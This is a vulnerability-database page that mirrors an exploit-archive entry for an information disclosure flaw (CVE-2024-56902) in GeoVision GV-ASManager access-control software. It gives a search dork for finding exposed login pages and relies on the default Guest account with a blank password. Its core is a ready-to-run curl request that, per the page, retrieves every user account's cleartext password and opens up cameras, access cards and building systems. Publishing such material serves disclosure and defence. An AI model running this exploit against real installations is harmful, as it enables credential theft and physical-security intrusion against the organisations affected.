GeoVision GV-ASManager 6.1.0.0 - Information Disclosure

🗓️ 08 Apr 2025 00:00:00Reported by Giorgi DograshviliType

exploitdb🔗 www.exploit-db.com👁 290 Views

Information disclosure in GeoVision GV-ASManager enables low privilege accounts to exploit user data.

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2024-56902	2 Feb 202522:00	–	circl
CNNVD	Geovision GV-ASWeb 安全漏洞	3 Feb 202500:00	–	cnnvd
CVE	CVE-2024-56902	3 Feb 202500:00	–	cve
Cvelist	CVE-2024-56902	3 Feb 202500:00	–	cvelist
Exploit DB	GeoVision GV-ASManager 6.1.0.0 - Broken Access Control	11 Apr 202500:00	–	exploitdb
NVD	CVE-2024-56902	3 Feb 202521:15	–	nvd
Packet Storm	Geovision GV-ASManager 6.1.10 Cross Site Request Forgery	27 Mar 202500:00	–	packetstorm
Packet Storm	📄 GeoVision GV-ASManager 6.1.0.0 Information Disclosure	8 Apr 202500:00	–	packetstorm
Positive Technologies	PT-2025-3344 · Geovision · Geovision Gv-Asweb	3 Feb 202500:00	–	ptsecurity
RedhatCVE	CVE-2024-56902	8 Feb 202504:37	–	redhatcve

# Exploit Title: Information Disclosure in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56902
# PoC: https://github.com/DRAGOWN/CVE-2024-56902


Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.

Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)

Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account is able to:
- Enumerate user accounts
- Retrieve cleartext password of any account in GV-ASManager.
After reusing the retrieved password, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Reusing retrieved password in other digital assets of the organization.

cURL script:

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
   -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
    --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
    $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'


After a successful attack, you will get access to:
- ASWeb	- Access & Security Management 
- TAWeb	- Time and Attendance Management 
- VMWeb	- Visitor Management 
- ASManager - Access & Security Management software in OS

08 Apr 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.17.5

EPSS0.2132

SSVC